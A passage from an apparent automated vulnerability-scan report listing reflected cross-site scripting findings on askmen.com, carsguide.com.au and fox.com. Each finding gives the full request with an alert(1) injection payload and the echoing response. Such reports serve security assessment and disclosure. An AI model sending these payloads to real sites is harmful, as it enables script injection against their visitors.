Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <title>Page Not Found
...[SNIP]...
<!-- us : top_10/carsd514b--><script>alert(1)</script>547716ebfec/fastest-cars-in-the-world.html-->

1.138. http://www.askmen.com/top_10/cars/fastest-cars-in-the-world.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.askmen.com
Path:   /top_10/cars/fastest-cars-in-the-world.html

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload 5930d--><script>alert(1)</script>e54392f1e73 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /top_10/cars/fastest-cars-in-the-world.html5930d--><script>alert(1)</script>e54392f1e73 HTTP/1.1
Host: www.askmen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.askmen.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=askmen.131775351301803.50.23.123.106; s_vi=[CS]v1|2745A955050126E8-40000108E05B8422[CE]; NSC_btlnfo_iuuq_wjq=ffffffff0955523745525d5f4f58455e445a4a423660; decc=US; i18n-cc=US; s_pers=%20s_nr%3D1317753573453%7C1320345573453%3B%20s_lv%3D1317758792503%7C1412366792503%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1317760592503%3B; __utma=238685328.1799806713.1317753548.1317756116.1317758791.3; __utmb=238685328.2.10.1317758791; __utmc=238685328; __utmz=238685328.1317758791.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; NGUserID=a5d4238-2366-2041309540-1; show_snazzy_title2=2; freq=c-1317758753956v-2n-29mc+1317758753946mv+0mn+0wwe~0; rsi_segs=; _chartbeat2=qa5w60rf92klr4yn.1317753718135; s_sess=%20s_v13%3Dstitial.askmen.com%253Awww.askmen.com%3B%20s_c13%3Dstitial.askmen.com%253Awww.askmen.com%3B%20s_cc%3Dtrue%3B%20s_sq%3Dignaskmen-us%253D%252526pid%25253Daskmen%2525253AHomepage%2525253Aam_channel%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.askmen.com/top_10/cars/fastest-cars-in-the-world.html%252526ot%25253DA%3B

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.11 (Unix) PHP/5.2.9
X-Powered-By: PHP/5.2.9
ServerHost: (null)
Content-Length: 38708
Content-Type: text/html; charset=iso-8859-1
Expires: Tue, 04 Oct 2011 20:15:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 20:15:35 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <title>Page Not Found
...[SNIP]...
<!-- us : top_10/cars/fastest-cars-in-the-world.html5930d--><script>alert(1)</script>e54392f1e73/-->

1.139. http://www.carsguide.com.au/search/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.carsguide.com.au
Path:   /search/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4c784'><script>alert(1)</script>1c084a16ce2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search/?N=4294962119&origin=browse&Nf=pYear|GTEQ%202008&type=cars&4c784'><script>alert(1)</script>1c084a16ce2=1 HTTP/1.1
Host: www.carsguide.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.carsguide.com.au/search/home/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=rGM2nkaLMWf-XMYANDn; recent_search_value=2010; recent_search_url=http://www.carsguide.com.au/search/?N~4294962119&origin~browse&Nf~pYear|GTEQ%202010&type~cars; __utma=177971127.1567727582.1317753560.1317756126.1317758800.3; __utmb=177971127.1.10.1317758800; __utmc=177971127; __utmz=177971127.1317758800.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; sopsview=4; prev_google_param=; home_page=yes; session_start_time=1317758866493; k_visit=3; NetInsightSessionID=1

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Cache-Control: max-age=300
Date: Tue, 04 Oct 2011 20:22:54 GMT
Content-Length: 163365
Connection: close


        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="http://rdf.data-
...[SNIP]...
<a href='http://www.carsguide.com.au/search/vehicle-details/D_27018486/@N=4294962119&origin=browse&Nf=pYear|GTEQ%202008&type=cars&4c784'><script>alert(1)</script>1c084a16ce2=1&searchType=1&vehicleType=1&pos=1&nr=New_700410820110308'>
...[SNIP]...

1.140. http://www.carsguide.com.au/search/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.carsguide.com.au
Path:   /search/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ab6bb"-alert(1)-"4596c19f3ae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /search/?N=4294962119&origin=browse&Nf=pYear|GTEQ%202008&type=cars&ab6bb"-alert(1)-"4596c19f3ae=1 HTTP/1.1
Host: www.carsguide.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.carsguide.com.au/search/home/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=rGM2nkaLMWf-XMYANDn; recent_search_value=2010; recent_search_url=http://www.carsguide.com.au/search/?N~4294962119&origin~browse&Nf~pYear|GTEQ%202010&type~cars; __utma=177971127.1567727582.1317753560.1317756126.1317758800.3; __utmb=177971127.1.10.1317758800; __utmc=177971127; __utmz=177971127.1317758800.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; sopsview=4; prev_google_param=; home_page=yes; session_start_time=1317758866493; k_visit=3; NetInsightSessionID=1

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Cache-Control: max-age=280
Date: Tue, 04 Oct 2011 20:23:19 GMT
Content-Length: 160005
Connection: close


        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="http://rdf.data-
...[SNIP]...
   $(document).CG_setCookie("recent_search_value","2008");
       $(document).CG_setCookie("recent_search_url","http://www.carsguide.com.au/search/?N~4294962119&origin~browse&Nf~pYear|GTEQ%202008&type~cars&ab6bb"-alert(1)-"4596c19f3ae~1");
    </script>
...[SNIP]...

1.141. http://www.carsguide.com.au/search/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.carsguide.com.au
Path:   /search/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d43e"><script>alert(1)</script>8ac1c0a1eaa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search/?N=4294962119&origin=browse&Nf=pYear|GTEQ%202008&type=cars&9d43e"><script>alert(1)</script>8ac1c0a1eaa=1 HTTP/1.1
Host: www.carsguide.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.carsguide.com.au/search/home/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=rGM2nkaLMWf-XMYANDn; recent_search_value=2010; recent_search_url=http://www.carsguide.com.au/search/?N~4294962119&origin~browse&Nf~pYear|GTEQ%202010&type~cars; __utma=177971127.1567727582.1317753560.1317756126.1317758800.3; __utmb=177971127.1.10.1317758800; __utmc=177971127; __utmz=177971127.1317758800.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; sopsview=4; prev_google_param=; home_page=yes; session_start_time=1317758866493; k_visit=3; NetInsightSessionID=1

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Cache-Control: max-age=291
Date: Tue, 04 Oct 2011 20:22:44 GMT
Content-Length: 163365
Connection: close


        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="http://rdf.data-
...[SNIP]...
<a title="remove" href="http://www.carsguide.com.au/search/?9d43e"><script>alert(1)</script>8ac1c0a1eaa=1&origin=browse&type=cars&N=4294962119">
...[SNIP]...

1.142. http://www.carsguide.com.au/search/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.carsguide.com.au
Path:   /search/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload a844c><script>alert(1)</script>159981e1a16 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search/?N=4294962119&origin=browse&Nf=pYear|GTEQ%202008&type=cars&a844c><script>alert(1)</script>159981e1a16=1 HTTP/1.1
Host: www.carsguide.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.carsguide.com.au/search/home/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=rGM2nkaLMWf-XMYANDn; recent_search_value=2010; recent_search_url=http://www.carsguide.com.au/search/?N~4294962119&origin~browse&Nf~pYear|GTEQ%202010&type~cars; __utma=177971127.1567727582.1317753560.1317756126.1317758800.3; __utmb=177971127.1.10.1317758800; __utmc=177971127; __utmz=177971127.1317758800.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; sopsview=4; prev_google_param=; home_page=yes; session_start_time=1317758866493; k_visit=3; NetInsightSessionID=1

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Cache-Control: max-age=270
Date: Tue, 04 Oct 2011 20:23:04 GMT
Content-Length: 163141
Connection: close


        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="http://rdf.data-
...[SNIP]...
<a href=http://www.carsguide.com.au/search/vehicle-details/D_27018486/@N=4294962119&origin=browse&Nf=pYear|GTEQ%202008&type=cars&a844c><script>alert(1)</script>159981e1a16=1&searchType=1&vehicleType=1&pos=1&nr=New_700410820110308>
...[SNIP]...

1.143. http://www.carsguide.com.au/search/ [origin parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.carsguide.com.au
Path:   /search/

Issue detail

The value of the origin request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 44e9a"-alert(1)-"20a8672a183 was submitted in the origin parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /search/?N=4294962119&origin=browse44e9a"-alert(1)-"20a8672a183&Nf=pYear|GTEQ%202008&type=cars HTTP/1.1
Host: www.carsguide.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.carsguide.com.au/search/home/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=rGM2nkaLMWf-XMYANDn; recent_search_value=2010; recent_search_url=http://www.carsguide.com.au/search/?N~4294962119&origin~browse&Nf~pYear|GTEQ%202010&type~cars; __utma=177971127.1567727582.1317753560.1317756126.1317758800.3; __utmb=177971127.1.10.1317758800; __utmc=177971127; __utmz=177971127.1317758800.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; sopsview=4; prev_google_param=; home_page=yes; session_start_time=1317758866493; k_visit=3; NetInsightSessionID=1

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Cache-Control: max-age=287
Date: Tue, 04 Oct 2011 20:21:56 GMT
Content-Length: 159334
Connection: close


        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="http://rdf.data-
...[SNIP]...
<script>
       $(document).CG_setCookie("recent_search_value","2008");
       $(document).CG_setCookie("recent_search_url","http://www.carsguide.com.au/search/?N~4294962119&origin~browse44e9a"-alert(1)-"20a8672a183&Nf~pYear|GTEQ%202008&type~cars");
    </script>
...[SNIP]...

1.144. http://www.carsguide.com.au/search/ [origin parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.carsguide.com.au
Path:   /search/

Issue detail

The value of the origin request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c8533'><script>alert(1)</script>b5e3982c842 was submitted in the origin parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search/?N=4294962119&origin=browsec8533'><script>alert(1)</script>b5e3982c842&Nf=pYear|GTEQ%202008&type=cars HTTP/1.1
Host: www.carsguide.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.carsguide.com.au/search/home/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=rGM2nkaLMWf-XMYANDn; recent_search_value=2010; recent_search_url=http://www.carsguide.com.au/search/?N~4294962119&origin~browse&Nf~pYear|GTEQ%202010&type~cars; __utma=177971127.1567727582.1317753560.1317756126.1317758800.3; __utmb=177971127.1.10.1317758800; __utmc=177971127; __utmz=177971127.1317758800.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; sopsview=4; prev_google_param=; home_page=yes; session_start_time=1317758866493; k_visit=3; NetInsightSessionID=1

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Cache-Control: max-age=296
Date: Tue, 04 Oct 2011 20:21:31 GMT
Content-Length: 162694
Connection: close


        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="http://rdf.data-
...[SNIP]...
<a href='http://www.carsguide.com.au/search/vehicle-details/D_27018486/@N=4294962119&origin=browsec8533'><script>alert(1)</script>b5e3982c842&Nf=pYear|GTEQ%202008&type=cars&searchType=1&vehicleType=1&pos=1&nr=New_700410820110308'>
...[SNIP]...

1.145. http://www.carsguide.com.au/search/ [origin parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.carsguide.com.au
Path:   /search/

Issue detail

The value of the origin request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 8c458><script>alert(1)</script>bdec3ca667b was submitted in the origin parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search/?N=4294962119&origin=browse8c458><script>alert(1)</script>bdec3ca667b&Nf=pYear|GTEQ%202008&type=cars HTTP/1.1
Host: www.carsguide.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.carsguide.com.au/search/home/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=rGM2nkaLMWf-XMYANDn; recent_search_value=2010; recent_search_url=http://www.carsguide.com.au/search/?N~4294962119&origin~browse&Nf~pYear|GTEQ%202010&type~cars; __utma=177971127.1567727582.1317753560.1317756126.1317758800.3; __utmb=177971127.1.10.1317758800; __utmc=177971127; __utmz=177971127.1317758800.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; sopsview=4; prev_google_param=; home_page=yes; session_start_time=1317758866493; k_visit=3; NetInsightSessionID=1

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Cache-Control: max-age=295
Date: Tue, 04 Oct 2011 20:21:41 GMT
Content-Length: 162470
Connection: close


        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="http://rdf.data-
...[SNIP]...
<a href=http://www.carsguide.com.au/search/vehicle-details/D_27018486/@N=4294962119&origin=browse8c458><script>alert(1)</script>bdec3ca667b&Nf=pYear|GTEQ%202008&type=cars&searchType=1&vehicleType=1&pos=1&nr=New_700410820110308>
...[SNIP]...

1.146. http://www.carsguide.com.au/search/ [origin parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.carsguide.com.au
Path:   /search/

Issue detail

The value of the origin request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa0d4"><script>alert(1)</script>2cca48b2cd6 was submitted in the origin parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search/?N=4294962119&origin=browsefa0d4"><script>alert(1)</script>2cca48b2cd6&Nf=pYear|GTEQ%202008&type=cars HTTP/1.1
Host: www.carsguide.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.carsguide.com.au/search/home/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=rGM2nkaLMWf-XMYANDn; recent_search_value=2010; recent_search_url=http://www.carsguide.com.au/search/?N~4294962119&origin~browse&Nf~pYear|GTEQ%202010&type~cars; __utma=177971127.1567727582.1317753560.1317756126.1317758800.3; __utmb=177971127.1.10.1317758800; __utmc=177971127; __utmz=177971127.1317758800.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; sopsview=4; prev_google_param=; home_page=yes; session_start_time=1317758866493; k_visit=3; NetInsightSessionID=1

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Cache-Control: max-age=288
Date: Tue, 04 Oct 2011 20:21:20 GMT
Content-Length: 162694
Connection: close


        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="http://rdf.data-
...[SNIP]...
<a title="remove" href="http://www.carsguide.com.au/search/?origin=browsefa0d4"><script>alert(1)</script>2cca48b2cd6&type=cars&N=4294962119">
...[SNIP]...

1.147. http://www.fox.com/_ugc/xml/homepage_ep_2011-10-4.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ugc/xml/homepage_ep_2011-10-4.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2c8fd"-alert(1)-"38339057e99 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ugc2c8fd"-alert(1)-"38339057e99/xml/homepage_ep_2011-10-4.xml HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/flash/EditorialPod.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%252C%255B'D%25253Dc18'%252C'1317753575301'%255D%252C%255B'D%25253Dc18'%252C'1317756162059'%255D%252C%255B'D%25253Dc18'%252C'1317758812957'%255D%255D%7C1475611612957%3B%20s_vnum%3D1320123600936%2526vn%253D4%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317760612959%3B%20s_dayslastvisit%3D1317758813012%7C1412366813012%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760613012%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedwww.newscorp.comwww.newscorp.com%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.111
Content-Type: text/html; charset=utf-8
Content-Length: 21897
Cache-Control: max-age=3600
Date: Tue, 04 Oct 2011 20:10:09 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ugc2c8fd"-alert(1)-"38339057e99:xmlhomepage_ep_2011-10-4"
s_analytics.hier1="fox:shows:_ugc2c8fd"-alert(1)-"38339057e99:xmlhomepage_ep_2011-10-4" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_ugc2c8fd"-ale
...[SNIP]...

1.148. http://www.fox.com/_ugc/xml/homepage_ep_2011-10-4.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ugc/xml/homepage_ep_2011-10-4.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3f997"-alert(1)-"b5848d7db55 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ugc/xml3f997"-alert(1)-"b5848d7db55/homepage_ep_2011-10-4.xml HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/flash/EditorialPod.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%252C%255B'D%25253Dc18'%252C'1317753575301'%255D%252C%255B'D%25253Dc18'%252C'1317756162059'%255D%252C%255B'D%25253Dc18'%252C'1317758812957'%255D%255D%7C1475611612957%3B%20s_vnum%3D1320123600936%2526vn%253D4%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317760612959%3B%20s_dayslastvisit%3D1317758813012%7C1412366813012%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760613012%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedwww.newscorp.comwww.newscorp.com%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.118
Content-Type: text/html; charset=utf-8
Content-Length: 21869
Cache-Control: max-age=3600
Date: Tue, 04 Oct 2011 20:10:13 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ugc:xml3f997"-alert(1)-"b5848d7db55homepage_ep_2011-10-4"
s_analytics.hier1="fox:shows:_ugc:xml3f997"-alert(1)-"b5848d7db55homepage_ep_2011-10-4" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_ugc:xml3f997"-ale
...[SNIP]...

1.149. http://www.fox.com/_ugc/xml/homepage_ep_2011-10-4.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ugc/xml/homepage_ep_2011-10-4.xml

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1a6d4"-alert(1)-"dd4b1ac882d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ugc/xml/homepage_ep_2011-10-4.xml1a6d4"-alert(1)-"dd4b1ac882d HTTP/1.1
